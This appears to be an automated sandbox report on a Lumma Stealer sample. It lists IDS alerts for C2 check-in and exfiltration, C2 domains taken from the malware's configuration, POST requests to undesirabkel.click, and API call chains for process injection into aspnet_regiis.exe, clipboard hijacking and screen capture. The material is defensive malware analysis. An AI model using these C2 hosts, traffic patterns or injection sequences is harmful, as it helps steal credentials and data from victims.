Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	2_2_027B1D90

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49744 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2058550 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click) : 192.168.2.4:49481 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058551 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI) : 192.168.2.4:49741 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49745 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: undesirabkel.click
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IN8UF5IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18110Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6OYZR5SGAKWTWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8761Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4C4512I00S3LUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20414Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=W9TUYLRPWIGHR58YBQ4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1275Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L4TX8WMB2QKP1MQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587848Host: undesirabkel.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: undesirabkel.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: undesirabkel.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: undesirabkel.click

Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: aspnet_regiis.exe, 00000002.00000003.1837352702.0000000002B25000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1777756852.0000000004EF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: aspnet_regiis.exe, 00000002.00000003.1766585638.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730631937.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766680237.0000000004F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: aspnet_regiis.exe, 00000002.00000003.1766585638.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730631937.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730433864.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F29000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766680237.0000000004F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: aspnet_regiis.exe, 00000002.00000003.1730510808.0000000004F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: aspnet_regiis.exe, 00000002.00000003.1837433126.0000000002ADC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/
Source: aspnet_regiis.exe, 00000002.00000003.1806512102.0000000002B34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1796892734.0000000002B33000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1796850904.0000000002B30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/#
Source: aspnet_regiis.exe, 00000002.00000003.1806587367.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1810076497.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/a
Source: aspnet_regiis.exe, 00000002.00000003.1806374282.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1815938104.0000000002B43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/api
Source: aspnet_regiis.exe, 00000002.00000003.1816229667.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1815938104.0000000002B43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/api:5
Source: aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apiG5s_
Source: aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1816229667.0000000002B43000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1815938104.0000000002B43000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apiL7
Source: aspnet_regiis.exe, 00000002.00000002.2941737109.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.2003375329.0000000002B3D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apia7p_=
Source: aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apiam
Source: aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AAC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/apirs
Source: aspnet_regiis.exe, 00000002.00000003.1806555687.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click/d
Source: aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click:443/api
Source: aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click:443/apiE
Source: aspnet_regiis.exe, 00000002.00000003.2003141582.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.2941355347.0000000002AB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://undesirabkel.click:443/apiK
Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000002.00000003.1778986838.0000000004EE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: aspnet_regiis.exe, 00000002.00000003.1729879770.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1729784216.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000002.00000003.1778712544.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_027C2490 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_027C2490

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_04D31000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_04D31000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_027C2490 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_027C2490

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_027C2620 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

2_2_027C2620

System Summary

PE file contains section with special chars

Source: 9cOUjp7ybm.exe

Static PE information: section name: <qqo!9W

PE file has nameless sections

Source: 9cOUjp7ybm.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE18870 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,NtReadVirtualMemory,CreateProcessW,NtWriteVirtualMemory,NtWriteVirtualMemory,NtSetContextThread,NtResumeThread,		0_2_6CE18870
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE17960 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,		0_2_6CE17960

Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003F7140	0_2_003F7140
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003F39B0	0_2_003F39B0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_00428A40	0_2_00428A40
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_0042CAB0	0_2_0042CAB0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_0040DB20	0_2_0040DB20
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003F43B0	0_2_003F43B0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_00429390	0_2_00429390
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003F63C0	0_2_003F63C0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D6428	0_2_003D6428
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003F6CB0	0_2_003F6CB0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_0041B4F0	0_2_0041B4F0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_0040DDF0	0_2_0040DDF0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D6E63	0_2_003D6E63
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_0041DE30	0_2_0041DE30
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003F56A0	0_2_003F56A0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003F7F20	0_2_003F7F20
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_0040F7C0	0_2_0040F7C0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_003D6FC7	0_2_003D6FC7
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE117C0	0_2_6CE117C0
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE18870	0_2_6CE18870
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE17960	0_2_6CE17960
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE15540	0_2_6CE15540
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE1ED30	0_2_6CE1ED30
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE11010	0_2_6CE11010
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_6CE291E1	0_2_6CE291E1
Source: C:\Users\user\Desktop\9cOUjp7ybm.exe	Code function: 0_2_0042ABC0	0_2_0042ABC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027A5270	2_2_027A5270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B6270	2_2_027B6270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027CFA60	2_2_027CFA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_027B2A28	2_2_027B2A28
